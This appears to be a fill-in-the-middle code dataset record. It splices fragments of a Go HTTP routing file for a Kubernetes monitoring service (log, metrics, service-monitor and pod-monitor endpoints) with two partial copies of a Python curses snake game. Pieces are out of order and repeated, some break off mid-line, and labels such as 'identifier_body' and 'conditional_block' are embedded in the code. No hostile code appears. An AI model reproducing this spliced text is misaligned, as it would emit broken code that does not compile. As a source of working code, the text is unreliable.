// overview, info 数值量
route := engine.Group("/metrics/projects/:projectCode/clusters/:clusterId")
{
route.GET("/overview", rest.RestHandlerFunc(metrics.GetClusterOverview))
route.GET("/cpu_usage", rest.RestHandlerFunc(metrics.ClusterCPUUsage))
route.GET("/cpu_request_usage", rest.RestHandlerFunc(metrics.ClusterCPURequestUsage))
route.GET("/memory_usage", rest.RestHandlerFunc(metrics.ClusterMemoryUsage))
route.GET("/memory_request_usage", rest.RestHandlerFunc(metrics.ClusterMemoryRequestUsage))
route.GET("/disk_usage", rest.RestHandlerFunc(metrics.ClusterDiskUsage))
route.GET("/diskio_usage", rest.RestHandlerFunc(metrics.ClusterDiskioUsage))
route.GET("/pod_usage", rest.RestHandlerFunc(metrics.ClusterPodUsage))
route.GET("/nodes/:node/info", rest.RestHandlerFunc(metrics.GetNodeInfo))
route.GET("/nodes/:node/overview", rest.RestHandlerFunc(metrics.GetNodeOverview))
route.GET("/nodes/:node/cpu_usage", rest.RestHandlerFunc(metrics.GetNodeCPUUsage))
route.GET("/nodes/:node/cpu_request_usage", rest.RestHandlerFunc(metrics.GetNodeCPURequestUsage))
route.GET("/nodes/:node/memory_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryUsage))
route.GET("/nodes/:node/memory_request_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryRequestUsage))
route.GET("/nodes/:node/network_receive", rest.RestHandlerFunc(metrics.GetNodeNetworkReceiveUsage))
route.GET("/nodes/:node/network_transmit", rest.RestHandlerFunc(metrics.GetNodeNetworkTransmitUsage))
route.GET("/nodes/:node/disk_usage", rest.RestHandlerFunc(metrics.GetNodeDiskUsage))
route.GET("/nodes/:node/diskio_usage", rest.RestHandlerFunc(metrics.GetNodeDiskioUsage))
route.POST("/namespaces/:namespace/pods/cpu_usage", rest.RestHandlerFunc(
metrics.PodCPUUsage)) // 多个Pod场景, 可能有几十,上百Pod场景, 需要使用 Post 传递参数
route.POST("/namespaces/:namespace/pods/memory_used", rest.RestHandlerFunc(metrics.PodMemoryUsed))
route.POST("/namespaces/:namespace/pods/network_receive", rest.RestHandlerFunc(metrics.PodNetworkReceive))
route.POST("/namespaces/:namespace/pods/network_transmit", rest.RestHandlerFunc(metrics.PodNetworkTransmit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_usage",
rest.RestHandlerFunc(metrics.ContainerCPUUsage))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_used",
rest.RestHandlerFunc(metrics.ContainerMemoryUsed))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_limit",
rest.RestHandlerFunc(metrics.ContainerCPULimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_limit",
rest.RestHandlerFunc(metrics.ContainerMemoryLimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_read_total",
rest.RestHandlerFunc(metrics.ContainerDiskReadTotal))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_write_total",
rest.RestHandlerFunc(metrics.ContainerDiskWriteTotal))
route.GET("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.GET("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.GetServiceMonitor))
route.POST("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.CreateServiceMonitor))
route.PUT("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.UpdateServiceMonitor))
route.DELETE("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.DeleteServiceMonitor))
route.GET("/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.POST("/service_monitors/batchdelete",
rest.RestHandlerFunc(service_monitor.BatchDeleteServiceMonitor))
route.GET("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.GET("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.GetPodMonitor))
route.POST("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.CreatePodMonitor))
route.PUT("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.UpdatePodMonitor))
route.DELETE("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.DeletePodMonitor))
route.GET("/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.POST("/pod_monitors/batchdelete",
rest.RestHandlerFunc(podmonitor.BatchDeletePodMonitor))
}
}
// RegisterStoreGWRoutes 注册storegw http-sd
func RegisterStoreGWRoutes(gw *storegw.StoreGW) *route.Router {
router := route.New()
router.Get("/api/discover | identifier_body |
routes.go | /*
* Tencent is pleased to support the open source community by making Blueking Container Service available.
* Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package api
import (
"context"
"encoding/json"
"net/http"
"path"
"github.com/Tencent/bk-bcs/bcs-common/common/tcp/listener"
ginTracing "github.com/Tencent/bk-bcs/bcs-common/pkg/otel/trace/gin"
"github.com/TencentBlueKing/bkmonitor-kits/logger"
"github.com/gin-contrib/cors"
"github.com/gin-contrib/requestid"
"github.com/gin-gonic/gin"
"github.com/prometheus/common/route"
swaggerfiles "github.com/swaggo/files"
ginSwagger "github.com/swaggo/gin-swagger"
_ "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/docs" // docs xxx
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/logrule"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/metrics"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod"
podmonitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod_monitor"
service_monitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/servicemonitor"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/telemetry"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/config"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/middleware"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/tracing"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/storegw"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/utils"
)
// APIServer :
type APIServer struct {
ctx context.Context
engine *gin.Engine
srv *http.Server
addr string
port string
addrIPv6 string
}
// NewAPIServer :
func NewAPIServer(ctx context.Context, addr, port, addrIPv6 string) (*APIServer, error) {
gin.SetMode(gin.ReleaseMode)
engine := gin.Default()
srv := &http.Server{Addr: addr, Handler: engine}
s := &APIServer{
ctx: ctx,
engine: engine,
srv: srv,
addr: addr,
port: port,
addrIPv6: addrIPv6,
}
s.newRoutes(engine)
return s, nil
}
// Run :
func (a *APIServer) Run() error {
dualStackListener := listener.NewDualStackListener()
addr := utils.GetListenAddr(a.addr, a.port)
if err := dualStackListener.AddListenerWithAddr(utils.GetListenAddr(a.addr, a.port)); err != nil {
return err
}
logger.Infow("listening for requests and metrics", "address", addr)
if a.addrIPv6 != "" && a.addrIPv6 != a.addr |
return a.srv.Serve(dualStackListener)
}
// Close :
func (a *APIServer) Close() error {
return a.srv.Shutdown(a.ctx)
}
// newRoutes xxx
// @Title BCS-Monitor OpenAPI
// @BasePath /bcsapi/v4/monitor/api/projects/:projectId/clusters/:clusterId
func (a *APIServer) newRoutes(engine *gin.Engine) {
// 添加 X-Request-Id 头部
requestIdMiddleware := requestid.New(
requestid.WithGenerator(func() string {
return tracing.RequestIdGenerator()
}),
)
engine.Use(requestIdMiddleware, cors.Default())
// openapi 文档
// 访问 swagger/index.html, swagger/doc.json
engine.GET("/swagger/*any", ginSwagger.WrapHandler(swaggerfiles.Handler))
engine.GET("/-/healthy", HealthyHandler)
engine.GET("/-/ready", ReadyHandler)
// 注册 HTTP 请求
registerRoutes(engine.Group(""))
registerMetricsRoutes(engine.Group(""))
if config.G.Web.RoutePrefix != "" {
registerRoutes(engine.Group(config.G.Web.RoutePrefix))
registerMetricsRoutes(engine.Group(config.G.Web.RoutePrefix))
}
registerRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
registerMetricsRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
}
func registerRoutes(engine *gin.RouterGroup) {
// 日志相关接口
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.NsScopeAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
route := engine.Group("/projects/:projectId/clusters/:clusterId")
{
route.GET("/namespaces/:namespace/pods/:pod/containers", rest.RestHandlerFunc(pod.GetPodContainers))
route.GET("/namespaces/:namespace/pods/:pod/logs", rest.RestHandlerFunc(pod.GetPodLog))
route.GET("/namespaces/:namespace/pods/:pod/logs/download", rest.StreamHandler(pod.DownloadPodLog))
// sse 实时日志流
route.GET("/namespaces/:namespace/pods/:pod/logs/stream", rest.StreamHandler(pod.PodLogStream))
// 蓝鲸监控采集器
route.GET("/telemetry/bkmonitor_agent/", rest.STDRestHandlerFunc(telemetry.IsBKMonitorAgent))
// bk-log 日志采集规则
route.POST("/log_collector/entrypoints", rest.RestHandlerFunc(logrule.GetEntrypoints))
route.GET("/log_collector/rules", rest.RestHandlerFunc(logrule.ListLogCollectors))
route.POST("/log_collector/rules", rest.RestHandlerFunc(logrule.CreateLogRule))
route.GET("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.GetLogRule))
route.PUT("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.UpdateLogRule))
route.DELETE("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.DeleteLogRule))
route.POST("/log_collector/rules/:id/retry", rest.RestHandlerFunc(logrule.RetryLogRule))
route.POST("/log_collector/rules/:id/enable", rest.RestHandlerFunc(logrule.EnableLogRule))
route.POST("/log_collector/rules/:id/disable", rest.RestHandlerFunc(logrule.DisableLogRule))
}
}
// registerMetricsRoutes metrics 相关接口
func registerMetricsRoutes(engine *gin.RouterGroup) {
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.ProjectAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
// 命名规范
// usage 代表 百分比
// used 代表已使用
// overview, info 数值量
route := engine.Group("/metrics/projects/:projectCode/clusters/:clusterId")
{
route.GET("/overview", rest.RestHandlerFunc(metrics.GetClusterOverview))
route.GET("/cpu_usage", rest.RestHandlerFunc(metrics.ClusterCPUUsage))
route.GET("/cpu_request_usage", rest.RestHandlerFunc(metrics.ClusterCPURequestUsage))
route.GET("/memory_usage", rest.RestHandlerFunc(metrics.ClusterMemoryUsage))
route.GET("/memory_request_usage", rest.RestHandlerFunc(metrics.ClusterMemoryRequestUsage))
route.GET("/disk_usage", rest.RestHandlerFunc(metrics.ClusterDiskUsage))
route.GET("/diskio_usage", rest.RestHandlerFunc(metrics.ClusterDiskioUsage))
route.GET("/pod_usage", rest.RestHandlerFunc(metrics.ClusterPodUsage))
route.GET("/nodes/:node/info", rest.RestHandlerFunc(metrics.GetNodeInfo))
route.GET("/nodes/:node/overview", rest.RestHandlerFunc(metrics.GetNodeOverview))
route.GET("/nodes/:node/cpu_usage", rest.RestHandlerFunc(metrics.GetNodeCPUUsage))
route.GET("/nodes/:node/cpu_request_usage", rest.RestHandlerFunc(metrics.GetNodeCPURequestUsage))
route.GET("/nodes/:node/memory_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryUsage))
route.GET("/nodes/:node/memory_request_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryRequestUsage))
route.GET("/nodes/:node/network_receive", rest.RestHandlerFunc(metrics.GetNodeNetworkReceiveUsage))
route.GET("/nodes/:node/network_transmit", rest.RestHandlerFunc(metrics.GetNodeNetworkTransmitUsage))
route.GET("/nodes/:node/disk_usage", rest.RestHandlerFunc(metrics.GetNodeDiskUsage))
route.GET("/nodes/:node/diskio_usage", rest.RestHandlerFunc(metrics.GetNodeDiskioUsage))
route.POST("/namespaces/:namespace/pods/cpu_usage", rest.RestHandlerFunc(
metrics.PodCPUUsage)) // 多个Pod场景, 可能有几十,上百Pod场景, 需要使用 Post 传递参数
route.POST("/namespaces/:namespace/pods/memory_used", rest.RestHandlerFunc(metrics.PodMemoryUsed))
route.POST("/namespaces/:namespace/pods/network_receive", rest.RestHandlerFunc(metrics.PodNetworkReceive))
route.POST("/namespaces/:namespace/pods/network_transmit", rest.RestHandlerFunc(metrics.PodNetworkTransmit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_usage",
rest.RestHandlerFunc(metrics.ContainerCPUUsage))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_used",
rest.RestHandlerFunc(metrics.ContainerMemoryUsed))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_limit",
rest.RestHandlerFunc(metrics.ContainerCPULimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_limit",
rest.RestHandlerFunc(metrics.ContainerMemoryLimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_read_total",
rest.RestHandlerFunc(metrics.ContainerDiskReadTotal))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_write_total",
rest.RestHandlerFunc(metrics.ContainerDiskWriteTotal))
route.GET("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.GET("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.GetServiceMonitor))
route.POST("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.CreateServiceMonitor))
route.PUT("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.UpdateServiceMonitor))
route.DELETE("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.DeleteServiceMonitor))
route.GET("/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.POST("/service_monitors/batchdelete",
rest.RestHandlerFunc(service_monitor.BatchDeleteServiceMonitor))
route.GET("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.GET("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.GetPodMonitor))
route.POST("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.CreatePodMonitor))
route.PUT("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.UpdatePodMonitor))
route.DELETE("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.DeletePodMonitor))
route.GET("/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.POST("/pod_monitors/batchdelete",
rest.RestHandlerFunc(podmonitor.BatchDeletePodMonitor))
}
}
// RegisterStoreGWRoutes 注册storegw http-sd
func RegisterStoreGWRoutes(gw *storegw.StoreGW) *route.Router {
router := route.New()
router.Get("/api/discovery/targetgroups", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "application/json; charset=utf-8")
json.NewEncoder(w).Encode(gw.TargetGroups())
})
return router
}
// HealthyHandler 健康检查
func HealthyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
}
// ReadyHandler 健康检查
func ReadyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
}
| {
v6Addr := utils.GetListenAddr(a.addrIPv6, a.port)
if err := dualStackListener.AddListenerWithAddr(v6Addr); err != nil {
return err
}
logger.Infof("api serve dualStackListener with ipv6: %s", v6Addr)
} | conditional_block |
pysnake.py | import math
import curses
import random
import asyncio
# from asyncsnake import LockstepConsumers
from asyncsnake import run_coroutines, WaitMap
# from cursessnake import CursesCharacters
from cursessnake import wrapper
class GameOver(Exception):
pass
UP = 0-1j
RIGHT = 1+0j
DOWN = 0+1j
LEFT = -1+0j
INITIAL_LENGTH = 6
class ScreenBase:
COLORS = None
BLANK = ' '
def __init__(self, stdscr):
self.board = {}
self.stdscr = stdscr
self.stdscr.nodelay(1)
curses.curs_set(0)
self._color_id = {k: i
for i, k in enumerate(self.COLORS.keys(), 1)}
for k, c in self.COLORS.items():
curses.init_pair(self._color_id[k], c, curses.COLOR_BLACK)
def addch(self, pos, ch):
i = int(pos.imag)
j = int(pos.real)
self.board[i, j] = ch
self._update(i // 2, j)
assert self.gettile(pos) == ch
def gettile(self, pos):
i = int(pos.imag)
j = int(pos.real)
return self.board.get((i, j), self.BLANK)
def delch(self, pos, ch):
if self.gettile(pos) == ch:
self.addch(pos, self.BLANK)
def _update(self, row, col):
ch1 = self.board.get((2*row, col), self.BLANK)
ch2 = self.board.get((2*row+1, col), self.BLANK)
if ch1 != self.BLANK and ch2 != self.BLANK:
c = '\N{FULL BLOCK}'
elif ch1 != self.BLANK:
c = '\N{UPPER HALF BLOCK}'
elif ch2 != self.BLANK:
c = '\N{LOWER HALF BLOCK}'
else:
c = self.BLANK
color = next(
(i for ch, i in self._color_id.items() if ch in (ch1, ch2)),
0)
self.stdscr.addstr(row, col, c, curses.color_pair(color))
def refresh(self):
self.stdscr.refresh()
class Screen(ScreenBase):
BODY = 'X'
FOOD = 'o'
FASTER = '+'
SLOWER = '-'
COLORS = {BODY: curses.COLOR_BLUE,
FOOD: curses.COLOR_YELLOW,
FASTER: curses.COLOR_GREEN,
SLOWER: curses.COLOR_RED}
class Level:
def __init__(self, stdscr, width=30, height=20):
self.screen = Screen(stdscr)
self.waiters = WaitMap()
self.width, self.height = width, height
self.worm_holes = {
self.random_position(): self.random_position()
for _ in range(3)}
def random_position(self):
return complex(random.randint(0, self.width-1),
random.randint(0, self.height-1))
def is_free(self, pos):
return self.get_tile(pos) == self.screen.BLANK
def random_free_position(self):
p = self.random_position()
while not self.is_free(p):
p = self.random_position()
return p
def random_rect(self, w, h):
max_i = self.height - (h-1)
max_j = self.width - (w-1)
return complex(random.randint(0, max_j-1),
random.randint(0, max_i//2-1)*2)
def free_rect(self, pos, w, h):
return all(self.is_free(pos + i*1j + j)
for i in range(h)
for j in range(w))
def random_free_rect(self, w, h):
pos = self.random_rect(w, h)
while not self.free_rect(pos, w, h):
pos = self.random_rect(w, h)
return pos
def add_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.addch(pos + i + j*1j, ch)
def del_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.delch(pos + i + j*1j, ch)
async def food_loop_base(self, ch, fn, w=2, h=2):
while True:
pos = self.random_free_rect(w, h)
self.add_rect(pos, ch, w, h)
self.screen.refresh()
p = await self.wait_for_player_rect(pos, w, h)
self.del_rect(pos, ch, w, h)
fn(p)
def put_player(self, snake, pos):
self.screen.addch(pos, self.screen.BODY)
self.waiters.notify(pos, snake)
def clear_player(self, pos):
self.screen.addch(pos, self.screen.BLANK)
def has_player(self, pos):
return self.get_tile(pos) == self.screen.BODY
def get_tile(self, pos):
return self.screen.gettile(pos)
async def wait_for_player_rect(self, pos, w, h):
futures = [self.waiters.wait(pos + i*1j + j)
for i in range(h)
for j in range(w)]
wait = asyncio.wait(futures, return_when=asyncio.FIRST_COMPLETED)
dones, pending = await wait
for f in pending:
f.cancel()
results = []
for done in dones:
results.append(await done)
return results[0]
def wrap_pos(self, pos):
pos = self.worm_holes.get(pos, pos)
return complex(pos.real % self.width, pos.imag % self.height)
async def play(self, snakes):
t = 0
n = [0] * len(snakes)
while True:
i = min(range(len(snakes)), key=lambda i: n[i])
if n[i] > t:
self.screen.refresh()
await asyncio.sleep(0.01 * (n[i] - t))
t = n[i]
try:
snakes[i].step()
except GameOver:
for c in snakes[i].tail:
self.screen.addch(c, Screen.BLANK)
# s = max(1, snakes[i].wait-1)
del snakes[i]
if not snakes:
raise
# pos = self.random_free_position()
# snakes.append(AutoSnake(speed=s, pos=pos, length=1))
continue
w = max(1, math.ceil(math.log(len(snakes[i].tail), 2)))
n[i] += w
def main(stdscr):
level = Level(stdscr)
class Snake:
def __init__(self, pos=None, dir=None, controls=None, speed=None, length=None):
self.wait = speed or 10
if pos is None:
self.pos = 0+0j
else:
self.pos = pos
if dir is None:
self.prev_dir = self.next_dir = RIGHT
else:
self.prev_dir = self.next_dir = dir
self.steps = 0
self.tail = [self.pos] * (length or INITIAL_LENGTH)
self.tail_index = 0
if controls is None:
controls = [curses.KEY_UP,
curses.KEY_LEFT,
curses.KEY_DOWN,
curses.KEY_RIGHT]
else:
controls = [ord(c) if isinstance(c, str)
else c for c in controls]
self.controls = controls
async def get_directions(self, it):
async for c in it:
try:
i = self.controls.index(c)
except ValueError:
continue
next_dir = [0-1j, -1+0j, 0+1j, 1+0j][i]
if next_dir == -self.prev_dir:
self.next_dir = 0
else:
self.next_dir = next_dir
def step(self):
if self.next_dir == 0:
return
level.clear_player(self.tail[self.tail_index])
self.pos = level.wrap_pos(self.pos + self.next_dir)
self.prev_dir = self.next_dir
if level.has_player(self.pos):
raise GameOver("Boom! You hit yourself")
self.tail[self.tail_index] = self.pos
level.put_player(self, self.pos)
self.tail_index += 1
self.steps += 1
if self.tail_index == len(self.tail):
self.tail_index = 0
def slower(self):
self.wait = self.wait + 1
def faster(self):
self.wait = max(1, self.wait - 1)
def on_eat_food(self):
self.tail.insert(self.tail_index, self.tail[self.tail_index])
if len(self.tail) == level.width * level.height:
raise GameOver("You win!")
class AutoSnake(Snake):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.route = []
self.route_guard = None
async def get_directions(self, it):
async for c in it:
pass
def route_next(self):
if not self.route:
return
if self.route_guard and not self.route_guard():
return
self.next_dir = self.route.pop()
return True
def reroute(self):
# if self.wait > 1:
# target = Screen.FASTER
# else:
# target = Screen.FOOD
target = Screen.FOOD
res = self.route_to(target)
if res:
target_pos, self.route = res
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return (level.get_tile(next_pos) in (target, Screen.BLANK) and
level.get_tile(target_pos) == target)
self.route_guard = target_pos and guard
else:
self.route = self.compress()
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return not level.has_player(next_pos)
self.route_guard = guard
def compress(self):
p = self.pos
d = self.prev_dir
res = []
for i in range(min(10, len(self.tail) // 2)):
for r in (1j, 1, -1j):
t = level.wrap_pos(p + d*r)
if not level.has_player(t):
|
else:
break
res.reverse()
return res or [0]
def route_to(self, target):
parent = {self.pos: None}
def backtrack(p):
res = []
while parent[p]:
d, p = parent[p]
res.append(d)
return res
n = [self.pos]
i = 0
while i < len(n):
p = n[i]
i += 1
v = level.get_tile(p)
if v == target:
return p, backtrack(p)
elif v != Screen.BLANK and p != self.pos:
continue
for dir in (0-1j, -1+0j, 0+1j, 1+0j):
q = level.wrap_pos(p + dir)
if q not in parent:
parent[q] = (dir, p)
n.append(q)
def step(self):
if not self.route_next():
self.reroute()
self.route_next()
super().step()
# width = 160
# height = 90
# width, height = 30, 20
# width, height = 15, 15
# width, height = 160, 90
def food_loop():
return level.food_loop_base(Screen.FOOD, lambda p: p.on_eat_food())
def faster_loop():
return level.food_loop_base(Screen.FASTER, lambda p: p.faster())
def slower_loop():
return level.food_loop_base(Screen.SLOWER, lambda p: p.slower())
# input = LockstepConsumers()
snakes = [
AutoSnake(speed=4, pos=0+10j),
AutoSnake(speed=4, pos=10+12j),
# AutoSnake(speed=4, pos=15+12j),
# AutoSnake(speed=4, pos=0+16j),
]
tasks = [
# input.consume(CursesCharacters(stdscr)),
food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# faster_loop(),
# slower_loop(),
level.play(snakes),
]
# for s in snakes:
# tasks.append(
# s.get_directions(input.consumer()))
try:
msg = str(run_coroutines(tasks))
except GameOver as exn:
msg = exn.args[0]
except KeyboardInterrupt:
raise
msg = 'Thanks for playing!'
raise SystemExit('\n'.join(
[str(msg),
# "You ate %s foods" % (len(the_snake.tail) - INITIAL_LENGTH),
# "You moved %s tiles" % the_snake.steps,
"Good job!!"]))
if __name__ == "__main__":
wrapper(main)
| d = d * r
p += d
res.append(d)
break | conditional_block |
pysnake.py | import math
import curses
import random
import asyncio
# from asyncsnake import LockstepConsumers
from asyncsnake import run_coroutines, WaitMap
# from cursessnake import CursesCharacters
from cursessnake import wrapper
class GameOver(Exception):
pass
UP = 0-1j
RIGHT = 1+0j
DOWN = 0+1j
LEFT = -1+0j
INITIAL_LENGTH = 6
class ScreenBase:
COLORS = None
BLANK = ' '
def __init__(self, stdscr):
self.board = {}
self.stdscr = stdscr
self.stdscr.nodelay(1)
curses.curs_set(0)
self._color_id = {k: i
for i, k in enumerate(self.COLORS.keys(), 1)}
for k, c in self.COLORS.items():
curses.init_pair(self._color_id[k], c, curses.COLOR_BLACK)
def addch(self, pos, ch):
i = int(pos.imag)
j = int(pos.real)
self.board[i, j] = ch
self._update(i // 2, j)
assert self.gettile(pos) == ch
def gettile(self, pos):
i = int(pos.imag)
j = int(pos.real)
return self.board.get((i, j), self.BLANK)
def delch(self, pos, ch):
if self.gettile(pos) == ch:
self.addch(pos, self.BLANK)
def _update(self, row, col):
ch1 = self.board.get((2*row, col), self.BLANK)
ch2 = self.board.get((2*row+1, col), self.BLANK)
if ch1 != self.BLANK and ch2 != self.BLANK:
c = '\N{FULL BLOCK}'
elif ch1 != self.BLANK:
c = '\N{UPPER HALF BLOCK}'
elif ch2 != self.BLANK:
c = '\N{LOWER HALF BLOCK}'
else:
c = self.BLANK
color = next(
(i for ch, i in self._color_id.items() if ch in (ch1, ch2)),
0)
self.stdscr.addstr(row, col, c, curses.color_pair(color))
def refresh(self):
self.stdscr.refresh()
class Screen(ScreenBase):
BODY = 'X'
FOOD = 'o'
FASTER = '+'
SLOWER = '-'
COLORS = {BODY: curses.COLOR_BLUE,
FOOD: curses.COLOR_YELLOW,
FASTER: curses.COLOR_GREEN,
SLOWER: curses.COLOR_RED}
class Level:
def __init__(self, stdscr, width=30, height=20):
self.screen = Screen(stdscr)
self.waiters = WaitMap()
self.width, self.height = width, height
self.worm_holes = {
self.random_position(): self.random_position()
for _ in range(3)}
def random_position(self):
return complex(random.randint(0, self.width-1),
random.randint(0, self.height-1))
def is_free(self, pos):
return self.get_tile(pos) == self.screen.BLANK
def random_free_position(self):
p = self.random_position()
while not self.is_free(p):
p = self.random_position()
return p
def random_rect(self, w, h):
max_i = self.height - (h-1)
max_j = self.width - (w-1)
return complex(random.randint(0, max_j-1),
random.randint(0, max_i//2-1)*2)
def free_rect(self, pos, w, h):
return all(self.is_free(pos + i*1j + j)
for i in range(h)
for j in range(w))
def random_free_rect(self, w, h):
pos = self.random_rect(w, h)
while not self.free_rect(pos, w, h):
pos = self.random_rect(w, h)
return pos
def add_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.addch(pos + i + j*1j, ch)
def del_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.delch(pos + i + j*1j, ch)
async def food_loop_base(self, ch, fn, w=2, h=2):
while True:
pos = self.random_free_rect(w, h)
self.add_rect(pos, ch, w, h)
self.screen.refresh()
p = await self.wait_for_player_rect(pos, w, h)
self.del_rect(pos, ch, w, h)
fn(p)
def put_player(self, snake, pos):
self.screen.addch(pos, self.screen.BODY)
self.waiters.notify(pos, snake)
def clear_player(self, pos):
self.screen.addch(pos, self.screen.BLANK)
def has_player(self, pos):
return self.get_tile(pos) == self.screen.BODY
def get_tile(self, pos):
return self.screen.gettile(pos)
async def wait_for_player_rect(self, pos, w, h):
futures = [self.waiters.wait(pos + i*1j + j)
for i in range(h)
for j in range(w)]
wait = asyncio.wait(futures, return_when=asyncio.FIRST_COMPLETED)
dones, pending = await wait
for f in pending:
f.cancel()
results = []
for done in dones:
results.append(await done)
return results[0]
def wrap_pos(self, pos):
pos = self.worm_holes.get(pos, pos)
return complex(pos.real % self.width, pos.imag % self.height)
async def play(self, snakes):
|
def main(stdscr):
level = Level(stdscr)
class Snake:
def __init__(self, pos=None, dir=None, controls=None, speed=None, length=None):
self.wait = speed or 10
if pos is None:
self.pos = 0+0j
else:
self.pos = pos
if dir is None:
self.prev_dir = self.next_dir = RIGHT
else:
self.prev_dir = self.next_dir = dir
self.steps = 0
self.tail = [self.pos] * (length or INITIAL_LENGTH)
self.tail_index = 0
if controls is None:
controls = [curses.KEY_UP,
curses.KEY_LEFT,
curses.KEY_DOWN,
curses.KEY_RIGHT]
else:
controls = [ord(c) if isinstance(c, str)
else c for c in controls]
self.controls = controls
async def get_directions(self, it):
async for c in it:
try:
i = self.controls.index(c)
except ValueError:
continue
next_dir = [0-1j, -1+0j, 0+1j, 1+0j][i]
if next_dir == -self.prev_dir:
self.next_dir = 0
else:
self.next_dir = next_dir
def step(self):
if self.next_dir == 0:
return
level.clear_player(self.tail[self.tail_index])
self.pos = level.wrap_pos(self.pos + self.next_dir)
self.prev_dir = self.next_dir
if level.has_player(self.pos):
raise GameOver("Boom! You hit yourself")
self.tail[self.tail_index] = self.pos
level.put_player(self, self.pos)
self.tail_index += 1
self.steps += 1
if self.tail_index == len(self.tail):
self.tail_index = 0
def slower(self):
self.wait = self.wait + 1
def faster(self):
self.wait = max(1, self.wait - 1)
def on_eat_food(self):
self.tail.insert(self.tail_index, self.tail[self.tail_index])
